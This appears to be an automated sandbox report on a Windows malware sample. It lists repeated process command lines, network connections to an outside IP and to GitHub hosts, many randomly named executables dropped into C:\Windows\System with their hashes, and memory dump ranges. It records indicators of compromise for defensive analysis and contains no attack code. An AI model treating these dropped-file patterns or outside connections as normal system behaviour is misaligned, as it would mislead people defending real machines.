"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
Network
| Country | Destination | Domain | Proto |
| DE | 3.120.98.217:8080 | tcp | |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
Files
memory/4108-0-0x00007FF74F010000-0x00007FF74F402000-memory.dmp
memory/4108-1-0x0000024299BD0000-0x0000024299BE0000-memory.dmp
C:\Windows\System\PtHygGf.exe
| MD5 | 5165eafb8a7475f48765581e0e4891b7 |
| SHA1 | fef4ca84515233576a34dbd378bddfbad87b696e |
| SHA256 | f8eb1b93d5a169e242b27e66d5d495d9c96ab4782da9a15c221d66b97a7f0c3d |
| SHA512 | 73329d0fcd9f4edb80d5199ffcaae30d167e5c35190296d19eef7e1eee40d4247126f25181d1f041b715e30faf412b0a91b506be7c68b6564215f92e81aabf00 |
C:\Windows\System\xPvWnKI.exe
| MD5 | 026575b569a901f88826e8a29e815ed9 |
| SHA1 | 63e1050499bab7f0bdb811a631a7176a6676ce82 |
| SHA256 | 4127a459046356f0bb3f3b27c49cbf093e89e22dc47b80a7dbf8ff7899a7b895 |
| SHA512 | 020b85243fa9f5306ed3131b392bb743b70646ecbf05e374dd7c909f3f2c49c32271c42c123bd6567c9a8c11cc0b89eec24164fbdcbf113159452382112bb590 |
C:\Windows\System\VSsDrNE.exe
| MD5 | 20c0b338ae7c4b9d020446d977f9f513 |
| SHA1 | 0249d7872b169340c01a641d130ff9e09d7b27dc |
| SHA256 | 38a34391cf01d5dbd19c159ed223bfe13ec0874cfd467deae6b55e103594fd41 |
| SHA512 | 6082eed77a649a89e2b4e276bc02cba10fb5c7b45ab939991b0eb2578e2e4bd50843dd151f7ff37d43993819373d996f81ae5e3c21700e36f8579b4fd94a54d7 |
C:\Windows\System\zaiqPaj.exe
| MD5 | 601abe3e9c6506773c4e3b9f0fd1a37d |
| SHA1 | fc8a89f95f5055b82b958ae55e31977e48f6a42d |
| SHA256 | 75f43fd830da9dfafac13cabf6a9fd15099a3e6fb3918d55010b007d99bd96b6 |
| SHA512 | b2405b33e683740dc86f0c0f72d5880235252c4b44daa8e303f8c53091688451399a5961840166e24b63b8d885cabf06b0406f8b310e0a83125350a989c99a3d |
C:\Windows\System\CgNEims.exe
| MD5 | 93b9a193b4e6a21004b27cd06aa61d9f |
| SHA1 | 7de158f65a4641a278daa2054b00201b1ee4a1cd |
| SHA256 | d5be5525e02f6d4085f74968d2499c8fa3294575a0c349aa311dfaf7b8be2eb0 |
| SHA512 | 6d8ed6f995295254e09a1876e45ce6307c8ae694330b5937f7d9aa25c1eba54e1a0cd0a6111f2be42f4bdf367a3cb08ac036200ffdb70885196cc8f19e8c1dd4 |
C:\Windows\System\apclgLI.exe
| MD5 | 5bdd0d80683b9d43bbf4b1ef60e9b686 |
| SHA1 | e1f7aba3e065485174ae4859e9d0ce0e9ec1195b |
| SHA256 | ac14b9b8704fc18a3e847787fb874ef929c88bfc4744aab329010e46a20537e6 |
| SHA512 | 53cf554cce4b1d0e376caf356a11856ab29a62df32483be849cf0657e913a176506065c4aaa3455ee91ade959a50c7b932b08486eee7c4e25beb2b6e9a83ec6f |
C:\Windows\System\mbFMNHX.exe
| MD5 | 46d8120e1016cd1f3fbf07035727c46c |
| SHA1 | fd3a3f13b127a2ed0abb59ea7497825757988c81 |
| SHA256 | 27b4e93a89cd59a1e919f0bae050c1e8009f51be278ed9881cbc657a97b21e7f |
| SHA512 | fb8facc438fd87d2c59cbb17fba1660e2446a06b8958c57bb32da9ad70e838f1cc86932656911749f5665092218b11c1a9900e907a64f6377a048b5e8d5183d0 |
C:\Windows\System\ftUyhaz.exe
| MD5 | 7d06788397cd2abad3526d68dd09f4ae |
| SHA1 | 954e98801bafdac9b2978dee2227aecef3abb8b7 |
| SHA256 | ebdcc266158a00c7c32efa137012fd6f9b3c910e9d864cadecb9b7d580f14aa5 |
| SHA512 | eb84b413ae863f8182ee8430967c17ce34ec3eef204547fc87530c819cad491f387a00b4adeacdf2a198459b65d3b06f512e56344a3b6868de44d38a7972b868 |
memory/5000-58-0x000001B579FD0000-0x000001B579FF2000-memory.dmp
C:\Windows\System\jzIopth.exe
| MD5 | abb3b8c9cb5c3cc779b19078098ab96b |
| SHA1 | c0e4f6fe18f359b5a21e03f5b29c1be4bfdb8f71 |
| SHA256 | 264ba523a53d0932389e0a598386f61917f99f4901fdf770fa0a80f4b8066dca |
| SHA512 | 83c0a6b440fc24419ed22f4042b68b424dc73d5a8e99292388947bbbc3e2533f373db3d925e48038bfc8ea5b699b2e65bc0e3b08665d619c11257bc6b3d9012f |
memory/4856-76-0x00007FF777C70000-0x00007FF778062000-memory.dmp
C:\Windows\System\HwmblCG.exe
| MD5 | 15ae6b6924d1775ccbccd53f2f744abe |
| SHA1 | 8538e34967e4619f1e0b5e5927725a945f99dfcb |
| SHA256 | 3af467007e7ee8abf409097161c4601ccb78cb5aa730a010598e85952cd949a6 |
| SHA512 | 79a456fbe975df81a11ad0a04c570e0b1cd648d17df5d7fc300b638b7df4fcc756a4700fc07c2809ff136ba1a53f0bceae5dca4daef2581d0775833be67c994a |
C:\Windows\System\lFbNZEF.exe
| MD5 | 51bffacfd5d1d011b1da591ce8771720 |
| SHA1 | 6a8b8bf3b3a744719d09add896b3c31c660c6a16 |
| SHA256 | 0473da583075a14bab9788f1342ce8d4207f4edbfaea0b889ad6a0fb8fbffb26 |
| SHA512 | 1436d3129b1bc950d0f58a62bd84e04fd63f1161ea922f0ad6cbe036b9af42ca947cab3df83f74c5ecd81daa41e25ae637342cd33318538dee4774e8bb09d6a1 |
C:\Windows\System\fTTgQna.exe
| MD5 | ee5aac64e82eb916887adfb7a90d7903 |
| SHA1 | b7f6f114e65c6e180b64787eb06dd93f86fb8ab0 |
| SHA256 | 7cc3205ed17dbd641d9cf8ca2b33752b927cb4288587a0f4a979529f19dd8510 |
| SHA512 | ad601cae619d6ecb7b9b7d59bdc28c3293478c4de74e5f84d31468c32554a512552b17bc57c4a10a38ac388eecb952bed3e3f48c0972d40024d4c8ed28eb22bf |
C:\Windows\System\lTfPfop.exe
| MD5 | 9e5e32797deb7fb39a81057f8128c095 |
| SHA1 | 48ecf0378e9e0bdbd7b494f388b6b8f88401fd14 |
| SHA256 | 63f68012c72693fbba0efc0734140c713d55def26218ff033a9561be9664b73d |
| SHA512 | 6369cbb0e5fda63e4127c2d100bd0b85eaa1176cb86db7b0b5f2ce5c3dfa357e034d6031a227ca075ed3fbd630b98d59b5008863dd86522a2f4f9cfe8c8e4448 |
C:\Windows\System\RCUfeaX.exe
| MD5 | 4da69e9bfd31d0dd7f1e8025e61b1d34 |
| SHA1 | 4f70dca9e82da6169a35dcd5379c42225abcb389 |
| SHA256 | aa8fa9a5c91f6953bf963ae9476988858ca5803a8e2a92cdf453b6b26a40b7c3 |
| SHA512 | 7a6223a78a6b5dd868c9d851c5a7a5556f5e0b9161db7b9497175c33f23a84930921ba7d20cb9fb59163da80a7759e5272cf15ea378b3e94da4835b624406072 |
C:\Windows\System\zYhdmZi.exe
| MD5 | 5ac3cd7f87a29fb208e719902246a6de |
| SHA1 | e5fb24e681c6a81520aaede85d5ae4aabd216a05 |
| SHA256 | eda7dd1a6fc0ad6acb563f13a63ea1f3d79714fa62524e49ecf3656e95530df6 |
| SHA512 | ab77ff72f1a08b94e63c01551a3e71e043eb3ac1a0c334e9e50c6f46c01f670d37b63afe9d8cd2d016152af158e392c9d407365c4eeee532e3fe4d55afea70b2 |
C:\Windows\System\YrINZoJ.exe
| MD5 | e5faa2685e6e8198cc05a86824b84659 |
| SHA1 | cf672859b51fcf6c099397afa6143481f22872f8 |
| SHA256 | 78048d53ad39e64bb1d31f6228f9f62dfd7f76b0bd46307ad0815e494a778de4 |
| SHA512 | 8eb16c0fc088eca8da8e1c5c1c8e809895462662f6b07030f39ece60bf9136a7938b1561903832cdf6a916b1b05efddcd313b878f4d9373eb20a24fb7c11454b |
memory/2016-368-0x00007FF6289F0000-0x00007FF628DE2000-memory.dmp
memory/3160-371-0x00007FF7261D0000-0x00007FF7265C2000-memory.dmp
memory/2948-373-0x00007FF674EC0000-0x00007FF6752B2000-memory.dmp
memory/2960-374-0x00007FF63A600000-0x00007FF63A9F2000-memory.dmp
memory/1928-372-0x00007FF79CB60000-0x00007FF79CF52000-memory.dmp
memory/1948-370-0x00007FF780B30000-0x00007FF780F22000-memory.dmp
memory/5000-367-0x000001B57ACE0000-0x000001B57B486000-memory.dmp
C:\Windows\System\laaHjvu.exe
| MD5 | af2ce6343e2e2447df8512a45b9d3b9d |
| SHA1 | 49f961b83a6394cf7def498c6423d8d0620211f0 |
| SHA256 | 664cee42f98c6deb306aa02f4c1a6aad66243d945c855342a6a61c168cf33998 |
| SHA512 | a00898e60d0444091862bb4a27aaa25b8af5d8fe059d2f1b1aab543118bc246383fbf26e59b9ccef54c8a8b17a270696c1989cf6d92141c9fc565dc3ffd9dbe0 |
C:\Windows\System\SUoppDE.exe
| MD5 | d9c755ca9c6acaa454a20a8cfc3e927c |
| SHA1 | a0ee5e02425909e93a39b43a4d774dbd2e54c95a |
| SHA256 | 6cd1435b26f6c9196e30493927c00cd9e12401a2531a6e515231c0b0d9e55371 |
| SHA512 | 77d440a75bccab112585a4b69516999ef01dc93786fa4618bc8964b931da753461db74dd698352ee4e5b87e84bfc13b08d39f77e946abc846b9286b8ac3ff1b9 |
C:\Windows\System\vKdbnhm.exe
| MD5 | d4ecb9110b28a90938e95935fc2b9845 |
| SHA1 | d6dc95100e71f0e89c06e5bbe90e89e46d6e7039 |
| SHA256 | 75cc920ace9a931d92859c5b401688ba9f9dc8b1c1ce270c5cf86637366348a0 |
| SHA512 | 7a085377a4824481d6de4d780f42fbb8160982e93239eaf954ad03625c49e57cdab8a3d613e2315e52bf844e7b77028a98e741983a3e0ad6ca1a96ae80c81649 |
C:\Windows\System\ccVncHe.exe
| MD5 | ad0ff80f435612b634c5952426ff74c2 |
| SHA1 | 19c3be15bbb169a35dbed495f38fed673e0262be |
| SHA256 | 843fb018763aa01b73f17bc03384a0d1b8349bb397bbc30faf6d63c79fbd174a |
| SHA512 | 2c4e182e279648c6e47e2f6f2ef09a879d1ca32f0824e448b805f77b4f29279df907fb4e4cc4a854582d34fb38c822ee9598ed7395f256b58e3ed60c71ec3b9e |
memory/960-375-0x00007FF721660000-0x00007FF721A52000-memory.dmp
C:\Windows\System\rtfeKkF.exe
| MD5 | 45be6b737903a6e0423c7a58dace0002 |
| SHA1 | 40129ef1cf8a29d880b6bc457f34de967c2a7054 |
| SHA256 | d254095ef94e5a1c2efe9a26f70bab7ebfa72319a94d35cc7712e91cebc7da6e |
| SHA512 | 4138b0643842444d03af6d57818e57d7ced6561be114b62f5e479e024a37dc9a19bd42a83dedcdcd130801d320ba1bd0faf7bea51877f743856bb75fa422f603 |
C:\Windows\System\IPOwzGT.exe
| MD5 | bcdf6b3cc67d0999a80df63d8320123e |
| SHA1 | 407fd5522fb9e7f2d41d3d4c8f3c07116a14ad0e |
| SHA256 | cebe67f68e6e9f3b6865a1e3e6309fc05dc36dbc1dc2bf83525c50a2b6a1f750 |
| SHA512 | 2fa341fbf5fa8ca1904c1e4eaf6af79b23cc447ca1d3b022ace0a79ca3abab93604c23bdc2dbd58c2717a862d95000071aaaa79281cd867b4a2a2e60fd9512bd |
C:\Windows\System\QjGQrCH.exe
| MD5 | 7112b97f5f7177a9eac4b85f6b82d07b |
| SHA1 | 70a60c41631eeba346ba4f36193db52a4f583425 |
| SHA256 | 0d9ac015be55bafcea5d3e42662f2b36e695296e7266d658fb6f8e5a8db0600a |
| SHA512 | 4aee4ee7be5bf3b1302593271808967a91617f567849ac5b7f06209367f3b95f2c7da0e7fd86f3fbd6b606a8bcf5e11082991d791eb11dbf2955811eab9ea9c2 |
C:\Windows\System\vXzWkaT.exe
| MD5 | 176773fbbf5dce90013c293b3aa739bb |
| SHA1 | debe0c7b86595d38ae2a6759d0da0b1edaee578a |
| SHA256 | c4961c992a1d05d9e1ca2b188677d3e5c69e8a2979137c32605cceb20eb66e3b |
| SHA512 | e378b6fad3d8288243519d78b59770a242a49c668b942deae1c78036faa711bd7ebf44089140eb51767d732f90452c34dd1b965b080b53e00907ec63e7364f18 |
C:\Windows\System\RdEdqzy.exe
| MD5 | 1df8aa20e2a5ce6eb8194359e050628e |
| SHA1 | ac79160b23294079d59a0f65ec3d06841d79871f |
| SHA256 | 230b6f3458a9e0ebf4f3d63080866d1c9cfdf0d8aee38a61c88d9418b7c93f3c |
| SHA512 | 9e5bf52391347bbf2905c4ffad94e5809eed849bc7f207366183866e7c4210d3eb4e424f2e2dd641be78cd77caef323253ccaeba1f02fe96584cde6df42f884e |
C:\Windows\System\sFVTSRL.exe
| MD5 | 3667b976d33a0f178de62c9af59955a6 |
| SHA1 | 091ac50887b947f2b0a9f697a832a0f1b8f610f2 |
| SHA256 | c7f4bf45bce1a38f702205870f4bc97a92a9df2920ff65270b7848d8c1126edb |
| SHA512 | 6e597ca4799e775c2d74e2033525fd4c6adf486993e2d824edcfc9f32c579cbc8f5e85719c8078eaae3867380647f4a238666fd1c0be29b2acbf46015b9ade7c |
C:\Windows\System\XQTtzST.exe
| MD5 | 78e06e73e5e9b88e67dc65b53cd5df66 |
| SHA1 | 5598ebaf65f3bd5af63848d09ae93147f779a101 |
| SHA256 | c41155dbe5fdddef58e2f38c884738a24667c5b9a24d90abc87084309e61fdc9 |
| SHA512 | aee27a7aa13df6bc93b7581f32979d6345083f401c2293a3dc1efe274377ca71566c08520acc8b34f5d336c1c8f16fe2b7942f8c5174a5be32571172d95ae71e |
C:\Windows\System\okpqglc.exe
| MD5 | 7032f1ca25f414ae375f81f2574d8752 |
| SHA1 | 58b34a86509722f727764ab5de4eb8e7de9a2a1e |
| SHA256 | c672e495087fed5de3dbcf5b171d5ccd2b66bb9b1fc659d2b69836a4af59f630 |
| SHA512 | 6f11740995111cf512ae0ab9c848dc2400f56c5b9ba396606fc530403ea519701483de286cb31a7cfd61f38dd7f9c511f09a14649aa6a2124327a793fd715e74 |
C:\Windows\System\hiotGkt.exe
| MD5 | c91ec06d57aa6aea5bdce064e1a6b898 |
| SHA1 | b326ce68d9579fd32bb977928856b92b1a1a9ef2 |
| SHA256 | 89c78c889f03e0a0850746646bccde4bb2ad6ae025c44531959b17af856404a7 |
| SHA512 | 75ba216b96c130ca19176d3ae28afd48333c03fc53e407173003a4862f36a2865a015127a23aee690c493c6e0b3f9d7a25188d2979d7fd569e5c93f26115971e |
C:\Windows\System\aTwTwnd.exe
| MD5 | 5f8b0fcaf78d69f79f15afdd54fb82f5 |
| SHA1 | fc9046a507dbcfad34269740b91d4f0c29aae297 |
| SHA256 | e69dd0b1f518aeb705ebe8907176c1dc955387d9d51c1f18b9b6e7c54e4b393b |
| SHA512 | 186269b6b7efa29870229b4b104333833cbcdf0c5ad65f7cf327b6ff0645abd3f8bd4ddce031657aaeeb68fcfb79c577228a87105662e6e2412d31c07cf4bc93 |
C:\Windows\System\pEmheoo.exe
| MD5 | 7937d87bcb11e592797286883c2f6dad |
| SHA1 | bb38fc6aff83430f5861238ce77adc4b0d75db70 |
| SHA256 | cdc4dde80a14ad1341bad29a4085d3589ce8660d8fb0d25b76762705d013a6fd |
| SHA512 | 3b230033b82a7bc4812dd2691c79fe5b891e67d8befa3acdf0011d11e43e122b0292c6de8c7b3b15ce412eb744efe0e5690a3f34e5152380b4b7207261e14df5 |
memory/1976-75-0x00007FF731BA0000-0x00007FF731F92000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_er2fqpr5.u20.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Windows\System\tYQDfah.exe
| MD5 | 74095ede78cd680cc9f5fd877098ddd3 |
| SHA1 | 4eb131b69abc184dd7e16415ed20e4da74d88c31 |
| SHA256 | e54ebba1b2ba46fdb8ce44db1c16f7d7b82969f5d8e627c15d55cf11c22a6f7e |
| SHA512 | 566d4163ec3f65223582536293220eb382af8dba3043d8b051dba1f25827cb39ab4222ff177a97278a7756c032d597678643656b013f6d85621b0a0ad7fbb4bc |
memory/4184-39-0x00007FF6D1800000-0x00007FF6D1BF2000-memory.dmp
memory/3428-33-0x00007FF6D5EE0000-0x00007FF6D62D2000-memory.dmp
memory/4404-22-0x00007FF67D820000-0x00007FF67DC12000-memory.dmp
memory/3700-15-0x00007FF6FF220000-0x00007FF6FF612000-memory.dmp
C:\Windows\System\zjvilka.exe
| MD5 | 852e6c8ee1ef6ca72d530de3a3e65c27 |
| SHA1 | fb8e61b51b7580a5bf494744bd8054f2320da977 |
| SHA256 | 4f8581b871e0b198ca2abf2b5234162bbc66eab8d5efc889f7b49ebd63ed349d |
| SHA512 | d4c7d0e4eb428a2f3d2ad260f106d67113e2683bb41d359974f2545a57af7654f8dcbdab278924888ba2cb0e5892aa5ab45a85303fa319149a0c9c81d069ef7d |
memory/2956-377-0x00007FF7BD750000-0x00007FF7BDB42000-memory.dmp
memory/60-376-0x00007FF78DE10000-0x00007FF78E202000-memory.dmp
memory/2664-379-0x00007FF6B0EE0000-0x00007FF6B12D2000-memory.dmp
memory/788-380-0x00007FF7E2220000-0x00007FF7E2612000-memory.dmp
memory/4880-381-0x00007FF713260000-0x00007FF713652000-memory.dmp
memory/1444-382-0x00007FF7AA510000-0x00007FF7AA902000-memory.dmp
memory/3920-384-0x00007FF786360000-0x00007FF786752000-memory.dmp
memory/4716-385-0x00007FF6B1220000-0x00007FF6B1612000-memory.dmp
memory/3316-386-0x00007FF79BBB0000-0x00007FF79BFA2000-memory.dmp
memory/3756-383-0x00007FF717650000-0x00007FF717A42000-memory.dmp
memory/3724-378-0x00007FF64DD60000-0x00007FF64E152000-memory.dmp
C:\Windows\System\wDYTMdV.exe
| MD5 | 67d893d1a2095d39d451d08ee1cc05e9 |
| SHA1 | dad7ef4487e41ff3c3e600250e691ed16832dc94 |
| SHA256 | cc871666e89dd430f5e3dc9cc361cd1a4ecf7214b4b8daeb86cca2257079f3ce |
| SHA512 | 7799e4db272ac6c136cb55f2e50c1582a5027767dc6d148dbf159fdb6f776a047cf2ac573fbb2f2ca5a994173cf0465c93ef3f6e6c86e8981136e854def9801d |
memory/4184-3465-0x00007FF6D1800000-0x00007FF6D1BF2000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133627597084804078.txt
| MD5 | ec861d1b31e9e99a4a6548f1e0b504e1 |
| SHA1 | 8bf1243597aba54793caf29c5e6c258507f15652 |
| SHA256 | 9dcf45126bd51fcc0ef73e54cc07f8eec145bc17eef189acd15fba199972d7da |
| SHA512 | 30cf8103a2043fd7b1a54ce06ff2ca14ba382040297a177fc612bcf55878f9d0abbe3f7ea0e7be6b6981f7c67f8be09d77730670365af3d52a1e25640a224ffd |
memory/3700-3625-0x00007FF6FF220000-0x00007FF6FF612000-memory.dmp
memory/4404-3624-0x00007FF67D820000-0x00007FF67DC12000-memory.dmp
memory/1976-3628-0x00007FF731BA0000-0x00007FF731F92000-memory.dmp
memory/3428-3629-0x00007FF6D5EE0000-0x00007FF6D62D2000-memory.dmp
memory/4856-3631-0x00007FF777C70000-0x00007FF778062000-memory.dmp
memory/4716-3637-0x00007FF6B1220000-0x00007FF6B1612000-memory.dmp
memory/4184-3639-0x00007FF6D1800000-0x00007FF6D1BF2000-memory.dmp
